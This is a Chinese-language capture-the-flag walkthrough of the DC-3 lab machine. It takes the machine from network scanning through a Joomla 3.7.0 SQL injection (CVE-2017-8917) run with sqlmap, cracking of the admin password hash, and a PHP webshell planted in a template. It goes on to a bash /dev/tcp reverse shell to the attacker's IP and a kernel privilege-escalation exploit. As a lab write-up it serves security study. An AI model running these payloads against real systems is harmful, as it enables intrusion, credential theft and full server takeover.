信息收集
确定目标
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:9e:68:11, IPv4: 192.168.1.43
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.1.9 30:03:c8:49:52:4d CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5 3c:55:76:dc:ab:f5 (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.8 e4:05:41:0c:9a:2c (42:f1:e2:49:51:a5) (Unknown)
192.168.1.7 3c:e9:f7:c0:ef:c7 Intel Corporate
192.168.1.44 00:0c:29:e4:77:be VMware, Inc.
192.168.1.12 42:45:ab:5e:e9:ce (Unknown: locally administered)
192.168.1.4 4c:f2:02:dd:eb:da Xiaomi Communications Co Ltd
9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.451 seconds (104.45 hosts/sec). 8 responded
192.168.1.44 00:0c:29:e4:77:be VMware, Inc.
开放端口
└─# nmap -sV -p- 192.168.1.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-08 10:17 CST
Nmap scan report for 192.168.1.44
Host is up (0.00077s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:E4:77:BE (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds
只有一个80
flag 1
访问其网页看到以下内容
Welcome to DC-3.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)
欢迎来到DC-3。
这一次,只有一个旗帜,一个入口点,没有线索。
要获得该标志,您显然必须获得root权限。
如何成为根节点取决于您,当然也取决于系统。
祝你好运-我希望你能享受这个小挑战。
嗯……看不到什么信息
那看看它的网站指纹
└─# whatweb -v 192.168.1.44
WhatWeb report for http://192.168.1.44
Status : 200 OK
Title : Home
IP : 192.168.1.44
Country : RESERVED, ZZ
Summary : Apache[2.4.18], Bootstrap, Cookies[460ada11b31d3c5e5ca6e58fd5d3de27], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], HttpOnly[460ada11b31d3c5e5ca6e58fd5d3de27], JQuery, MetaGenerator[Joomla! - Open Source Content Management], PasswordField[password], Script[application/json]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.18 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Cookies ]
Display the names of cookies in the HTTP headers. The
values are not returned to save on space.
String : 460ada11b31d3c5e5ca6e58fd5d3de27
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.18 (Ubuntu) (from server string)
[ HttpOnly ]
If the HttpOnly flag is included in the HTTP set-cookie
response header and the browser supports it then the cookie
cannot be accessed through client side script - More Info:
http://en.wikipedia.org/wiki/HTTP_cookie
String : 460ada11b31d3c5e5ca6e58fd5d3de27
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ MetaGenerator ]
This plugin identifies meta generator tags and extracts its
value.
String : Joomla! - Open Source Content Management
[ PasswordField ]
find password fields
String : password (from field name)
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
String : application/json
HTTP Headers:
HTTP/1.1 200 OK
Date: Mon, 08 Jan 2024 02:40:23 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: 460ada11b31d3c5e5ca6e58fd5d3de27=7addibbboe7rp5ek26q3fs5c54; path=/; HttpOnly
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Last-Modified: Mon, 08 Jan 2024 02:40:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 2472
Connection: close
Content-Type: text/html; charset=utf-8
看到cms为 Joomla,kali上有款针对其的工具——joomscan
└─# joomscan --url http://192.168.1.44
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.1.44 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.44/administrator/components
http://192.168.1.44/administrator/modules
http://192.168.1.44/administrator/templates
http://192.168.1.44/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.1.44/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.1.44/
得到版本——3.7.0,还有admin登录页面http://192.168.1.44/administrator/
两个利用方法
1.利用searchsploit
2.利用搜索引擎搜索利用方法
这里展示searchsploit
└─# searchsploit Joomla 3.7.0
----------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site | php/webapps/43488.txt
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
选择第一个
└─# searchsploit -p 42033.txt # -p Show the full path to an exploit
Exploit: Joomla! 3.7.0 - 'com_fields' SQL Injection
URL: https://www.exploit-db.com/exploits/42033
Path: /usr/share/exploitdb/exploits/php/webapps/42033.txt
Codes: CVE-2017-8917
Verified: False
File Type: ASCII text
将其复制到当前目录
└─# cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla.txt
查看
└─# cat joomla.txt
# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917
URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
Parameter: list[fullordering] (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (DUAL)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
使用它给我们的sqlmap命令
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
___
__H__
___ ___[.]_____ ___ ___ {1.7.11#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
暴出来五个数据库,中途它会问几个问题,这里放出我的回答及其翻译
you have not declared cookie(s), while server wants to set its own ('460ada11b31d3c5e5ca6e58fd5d3de27=85h308t28pj...u65h9kn9g5'). Do you want to use those [Y/n] Y
您尚未声明cookie,而服务器希望设置自己的cookie('460ada11b31d3c5e5ca6e58fd5d3de27=85h308t28pj...u65h9kn9g5')。您想使用这些cookie吗[Y/n]
testing for SQL injection on GET parameter 'list[fullordering]'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
看起来后端DBMS是MySQL。您想跳过针对其他DBMS的特定测试有效负载吗?[Y/n]
GET parameter 'list[fullordering]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
GET 参数“list[fullordering]”易受攻击。是否要继续测试其他参数(如果有)?[y/N]
指定joomladb后,继续往后暴
暴表
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -
p list[fullordering]
76个表,其中看起来比较有价值的是#__users
暴字段
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
do you want to use common column existence check? [y/N/q] y
是否要使用公用列存在检查?[y/N/q]
回车就行
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-columns.txt' (press Enter)
[2] custom
暴出6个
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| name | non-numeric |
| email | non-numeric |
| id | numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
暴值,选了三个比较有价值的字段
└─# sqlmap -u "http://192.168.1.44/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password,username --dump -p list[fullordering]
+--------+--------------------------------------------------------------+----------+
| name | password | username |
+--------+--------------------------------------------------------------+----------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu | admin |
+--------+--------------------------------------------------------------+----------+
使用john解出hash加密后的密文
└─# john hash.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
snoopy (?)
1g 0:00:00:00 DONE 2/3 (2024-01-08 20:45) 4.347g/s 313.0p/s 313.0c/s 313.0C/s 123456..wizard
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
得到snoopy
在/administrator/index.php的登录页面成功登录(在前端同样也登录成功,但是没啥东西),翻看后在templates下找到突破口
在左边功能栏里看到templates(模板),点击后,左边功能栏默认选为styles,再点击右边template栏下的beez3,跳转到左栏为文件目录的页面,同时可以自由修改php文件内容,即刻就会想到一句话木马和反弹shell。但是不知道目录也没法连接……不过在点击任意php文件时,在左上方会显示部分的路径提示信息(e.g. Editing file “/html/modules.php” in template “beez3”.)
浅扫个目录吧
└─# dirb http://192.168.1.44
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan 9 00:06:41 2024
URL_BASE: http://192.168.1.44/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.44/ ----
==> DIRECTORY: http://192.168.1.44/administrator/
==> DIRECTORY: http://192.168.1.44/bin/
==> DIRECTORY: http://192.168.1.44/cache/
==> DIRECTORY: http://192.168.1.44/components/
==> DIRECTORY: http://192.168.1.44/images/
==> DIRECTORY: http://192.168.1.44/includes/
+ http://192.168.1.44/index.php (CODE:200|SIZE:7147)
==> DIRECTORY: http://192.168.1.44/language/
==> DIRECTORY: http://192.168.1.44/layouts/
==> DIRECTORY: http://192.168.1.44/libraries/
==> DIRECTORY: http://192.168.1.44/media/
==> DIRECTORY: http://192.168.1.44/modules/
==> DIRECTORY: http://192.168.1.44/plugins/
+ http://192.168.1.44/server-status (CODE:403|SIZE:300)
==> DIRECTORY: http://192.168.1.44/templates/
==> DIRECTORY: http://192.168.1.44/tmp/
---- Entering directory: http://192.168.1.44/administrator/ ----
==> DIRECTORY: http://192.168.1.44/administrator/cache/
==> DIRECTORY: http://192.168.1.44/administrator/components/
==> DIRECTORY: http://192.168.1.44/administrator/help/
==> DIRECTORY: http://192.168.1.44/administrator/includes/
+ http://192.168.1.44/administrator/index.php (CODE:200|SIZE:4797)
==> DIRECTORY: http://192.168.1.44/administrator/language/
==> DIRECTORY: http://192.168.1.44/administrator/logs/
==> DIRECTORY: http://192.168.1.44/administrator/modules/
==> DIRECTORY: http://192.168.1.44/administrator/templates/
---- Entering directory: http://192.168.1.44/bin/ ----
+ http://192.168.1.44/bin/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/cache/ ----
+ http://192.168.1.44/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/components/ ----
+ http://192.168.1.44/components/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/images/ ----
==> DIRECTORY: http://192.168.1.44/images/banners/
==> DIRECTORY: http://192.168.1.44/images/headers/
+ http://192.168.1.44/images/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/includes/ ----
+ http://192.168.1.44/includes/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/language/ ----
+ http://192.168.1.44/language/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/layouts/ ----
+ http://192.168.1.44/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/layouts/joomla/
==> DIRECTORY: http://192.168.1.44/layouts/libraries/
==> DIRECTORY: http://192.168.1.44/layouts/plugins/
---- Entering directory: http://192.168.1.44/libraries/ ----
==> DIRECTORY: http://192.168.1.44/libraries/cms/
+ http://192.168.1.44/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/libraries/joomla/
==> DIRECTORY: http://192.168.1.44/libraries/legacy/
+ http://192.168.1.44/libraries/vendor (CODE:403|SIZE:303)
---- Entering directory: http://192.168.1.44/media/ ----
==> DIRECTORY: http://192.168.1.44/media/cms/
==> DIRECTORY: http://192.168.1.44/media/contacts/
==> DIRECTORY: http://192.168.1.44/media/editors/
+ http://192.168.1.44/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/media/mailto/
==> DIRECTORY: http://192.168.1.44/media/media/
==> DIRECTORY: http://192.168.1.44/media/system/
---- Entering directory: http://192.168.1.44/modules/ ----
+ http://192.168.1.44/modules/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/plugins/ ----
==> DIRECTORY: http://192.168.1.44/plugins/authentication/
==> DIRECTORY: http://192.168.1.44/plugins/captcha/
==> DIRECTORY: http://192.168.1.44/plugins/content/
==> DIRECTORY: http://192.168.1.44/plugins/editors/
==> DIRECTORY: http://192.168.1.44/plugins/extension/
==> DIRECTORY: http://192.168.1.44/plugins/fields/
+ http://192.168.1.44/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/plugins/installer/
==> DIRECTORY: http://192.168.1.44/plugins/search/
==> DIRECTORY: http://192.168.1.44/plugins/system/
==> DIRECTORY: http://192.168.1.44/plugins/user/
---- Entering directory: http://192.168.1.44/templates/ ----
+ http://192.168.1.44/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/templates/system/
---- Entering directory: http://192.168.1.44/tmp/ ----
+ http://192.168.1.44/tmp/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.1.44/tmp/packages/
---- Entering directory: http://192.168.1.44/administrator/cache/ ----
+ http://192.168.1.44/administrator/cache/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/administrator/logs/ ----
+ http://192.168.1.44/administrator/logs/index.html (CODE:200|SIZE:31)
---- Entering directory: http://192.168.1.44/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/templates/system/ ----
==> DIRECTORY: http://192.168.1.44/templates/system/css/
==> DIRECTORY: http://192.168.1.44/templates/system/html/
==> DIRECTORY: http://192.168.1.44/templates/system/images/
+ http://192.168.1.44/templates/system/index.php (CODE:200|SIZE:0)
---- Entering directory: http://192.168.1.44/tmp/packages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.1.44/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jan 9 00:07:42 2024
DOWNLOADED: 83016 - FOUND: 20
看起来比较有价值的也就http://192.168.1.44/templates/和http://192.168.1.44/administrator/templates/,但是后者访问发现目录和刚刚的突破点结构不同,排除。
联想前面的线索,将http://192.168.1.44/templates/修改为http://192.168.1.44/templates/beez3/html/访问时,发现与前面目录极为相似。尝试写入@eval($_REQUEST['joomla']);到modules.php,并尝试用蚁剑连接(url填入http://192.168.1.44/templates/beez3/html/modules.php),发现连接成功。
这里蚁剑只是测试路径是否正确,真正有效的应是反弹shell,因为蚁剑的连接只是暂时的
在templates/beez3/html/shell.php写入
<?php
system("bash -c 'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1' ");
?>
解析:
这段PHP代码尝试执行一个系统命令,具体来说,它尝试启动一个bash shell,并通过TCP套接字与指定的IP地址和端口进行通信。这通常用于执行所谓的反向shell,允许攻击者从被攻陷的系统远程执行命令。
让我们逐一解析这段代码:
1. `<?php ... ?>`: 这是PHP的开放和关闭标签,表示其中的内容是PHP代码。
2. `system(...)`: PHP的`system`函数用于执行一个外部程序。该函数的第一个参数是要执行的命令字符串。
3. `bash -c 'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1'`: 这是要执行的命令。我们可以将其拆分为几个部分来理解:
* `bash -c`: 使用bash shell来执行后面的字符串作为命令。
* `'bash -i >& /dev/tcp/192.168.1.43/4444 0>&1'`: 这是一个bash shell命令字符串,我们再次分解:
+ `bash -i`: 启动交互式bash shell。
+ `>& /dev/tcp/192.168.1.43/4444`: 这将bash的标准输出和标准错误重定向到TCP套接字,连接到IP地址192.168.1.43的4444端口。
+ `0>&1`: 这将bash的标准输入重定向到标准输出,允许它读取从TCP套接字发送来的数据。
综上所述,这段代码的目的是在目标系统上启动一个反向shell,使其能够与IP地址192.168.1.43的4444端口进行通信,从而允许攻击者远程执行命令。
在kali上开启监听,访问http://192.168.1.44/templates/beez3/html/shell.php
ps:
`nc` 是一个在 Unix 和类 Unix 系统(如 Linux)上的命令行工具,用于数据传输。它的全称是 "netcat",尽管在某些系统上可能没有这个名称。
`-l` 选项使 `nc` 进入监听模式,这意味着它会等待来自某个端口的连接。
`-v` 选项使 `nc` 显示详细信息,这通常用于调试。
`-p 4444` 指定 `nc` 在端口 `4444` 上监听。
因此,命令 `nc -lvvp 4444` 的意思是:在端口 `4444` 上启动一个监听模式,显示详细信息,并等待连接
在 `nc -lvvp 4444` 命令中,两个 `v` 选项的意义是不同的。第一个 `v` 是用于显示详细信息的,而第二个 `v` 是用于在端口上显示详细连接信息的
└─# nc -lvvp 4444
listening on [any] 4444 ...
192.168.1.44: inverse host lookup failed: Unknown host
connect to [192.168.1.43] from (UNKNOWN) [192.168.1.44] 37278
bash: cannot set terminal process group (1324): Inappropriate ioctl for device
bash: no job control in this shell
www-data@DC-3:/var/www/html/templates/beez3/html$
查看系统信息
www-data@DC-3:/var/www/html/templates/beez3/html$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/beez3/html$ cat /proc/version
cat /proc/version
Linux version 4.4.0-21-generic (buildd@lgw01-06) (gcc version 5.3.1 20160413 (Ubuntu 5.3.1-14ubuntu2) ) #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016
www-data@DC-3:/var/www/html/templates/beez3/html$ cat /etc/issue # issue_发行
cat /etc/issue
Ubuntu 16.04 LTS \n \l
回到kali找一下当前ubuntu有啥漏洞
└─# searchsploit Ubuntu 16.04
----------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------- ---------------------------------
Apport 2.x (Ubuntu Desktop 12.10 < 16.04) - Local Co | linux/local/40937.txt
Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege E | linux/local/40054.c
Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker- | linux/local/40943.txt
LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local | linux/local/41923.txt
Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16 | linux_x86-64/local/42275.c
Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/1 | linux_x86/local/42276.c
Linux Kernel (Ubuntu 16.04) - Reference Count Overfl | linux/dos/39773.txt
Linux Kernel 4.14.7 (Ubuntu 16.04 / CentOS 7) - (KAS | linux/local/45175.c
Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Local Privil | linux/local/40759.rb
Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_cc | linux/dos/46529.c
Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF | linux_x86-64/local/40871.c
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter | linux_x86-64/local/40049.c
Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 | windows_x86-64/local/47170.c
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' | linux/local/39772.txt
Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_R | linux/local/40489.txt
Linux Kernel 4.8 (Ubuntu 16.04) - Leak sctp Kernel P | linux/dos/45919.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - L | linux/local/45010.c
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Pr | linux/local/44298.c
Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) - 'netfil | linux_x86-64/local/44300.c
Linux Kernel < 4.4.0-83 / < 4.8.0-58 (Ubuntu 14.04/1 | linux/local/43418.c
Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / | linux/local/47169.c
----------------------------------------------------- ---------------------------------
Shellcodes: No Results
这里使用double-fdput()
Linux Kernel_Linux 内核
└─# searchsploit -p 39772.txt
Exploit: Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation
URL: https://www.exploit-db.com/exploits/39772
Path: /usr/share/exploitdb/exploits/linux/local/39772.txt
Codes: CVE-2016-4557, 823603
Verified: True
File Type: C source, ASCII text
└─# cp /usr/share/exploitdb/exploits/linux/local/39772.txt 1604.txt
└─# vim 1604.txt
# 挺长的,看最下面
……
# 一个把所有这些放在一起的漏洞利用程序是 exploit.tar。使用方法:
An exploit that puts all this together is in exploit.tar. Usage:
user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)
This exploit was tested on a Ubuntu 16.04 Desktop system.
Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7
